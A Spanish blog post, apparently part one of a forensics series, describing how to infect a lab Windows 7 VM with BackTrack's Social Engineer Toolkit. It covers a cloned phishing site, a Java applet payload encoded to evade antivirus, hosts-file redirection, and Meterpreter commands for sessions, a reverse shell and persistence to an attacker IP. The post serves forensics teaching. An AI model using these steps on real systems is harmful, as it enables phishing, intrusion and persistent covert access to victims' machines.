Inicio > forense, kubuntu, set > Análisis Forense (I)

Análisis Forense (I)

Parte I – Preparando el entorno

En este post voy a compartirles un poco la experiencia de unas clases de análiss forense tomadas con @r0bertmart1nez, así que empezaremos con la primera parte que consiste en preparar el entorno -tener el malware en el cliente- para posteriormente realizar el análisis forense,  entonces manos a la obra.

Escenario del laboratorio:

  • Víctima: Windows 7 (sin ningún antivirus)
  • Atacante: BT5R1
  • Wmware Player 4.0.4
  1. Utilizando SET (Social Engineer Toolkit) elejiremos un modelo de llegar a nuestra víctima con el malware, en este caso, lo haremos por phishing a algún sitio en particular, si quierer saber más de SET revisen este post de @Dragonjar

Fig 1. Iniciar SET dentro de BT

Una vez iniciado SET vamos a elegir las siguientes opciones, no entraré en detalle de su objetivo, para ello pueden visitar el enlace anterior de SET y ver el detalle de cada uno de las opciones,  solo mencionaré que la inyección se realizará mediante un applet de java con phishing.

  Fig 2. Eligiendo el vector de ataque

Ahora indicaremos que es mediante un applet de java y creando por clonación un sitio falso.

Fig 3. Preparándonos para clonar un sitio

Fig 4. Clonando el sitio, cargando el payload y codificación

En esta etapa estamos seleccionando el payload y el método de codificación para que nuestro malware no sea detectado por el antivirus.

Una vez realizado esto y si todo ha ido bien se iniciarán el servidor para escuchar la conexión remota del cliente infectado, tal como se muestra en la figura siguiente.


Fig 5. Servidor listo para conexión reversa.

Finalmente tenemos que hacer que hacer que la víctima vaya a nuestro sitio falso, para ello podemos hacerlo por medio de un correo falso, inyectando un troyano que modifique el archivo hosts, envenamiento de arp, envenamiento de dns, sea cual fuere el método por temas de tiempo vamos a cambiar manualmente el archivo hosts del cliente para que redireccione las peticiones a nuetro servidor.

Una vez alterado el archivo hosts abrimos un navegador y hacemo que la víctima se redireccione a  nuestro sitio falso.

Fig 6. Applet del lado del cliente que carga el malware

Confiando en que el buen criterio de usuario le hará aceptará el applet presentado, se cargará el malware y nos habrirá una conexión remota hacia nuestro server y con el comando “sessions” veremos las sesiones activas por si tenemos más de una víctima, seguidamente con el comando “sessions -i <#session>” estaremos ya conectados a la victima, el resto ya depende de lo que deseemos hacer.

Es importante mantener la conexión después que el cliente cierre el browser, para ello vamos a ejecutar el siguiente comando “run persistence -U -i 5 -p 443 -r <IP SERVIDOR HACKER>”

Fig 7. Persistiendo la conexión

Para tener una shell remota basta con escribir el comando “shell” en el meterpreter, en la imagen siguiente se puede apreciar la conexión en la máquina del atacanque que es la misma información de la víctima.

Fig 8. Shell reverso exitoso

Lo que hagamos de aqui en adelante ya depende de lo que deseemos.

En la siguiente entrada veremos como recolectar la evidencia necesaria para empezar a realizar el análisis forense del equipo infectado.

NOTA: Si les da error al cargar el applet de java entonces actualicen la versión de SET en el home con el comando “sudo ./set-update”

Categorías:forense, kubuntu, set
  1. Raffic Vera C
    julio 21, 2012 a las 1:14 pm

    Muy buen aporte Carlos, claro y muy consiso. Pude realizar la ejecución de esto mediante la guía que has dejado.

  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: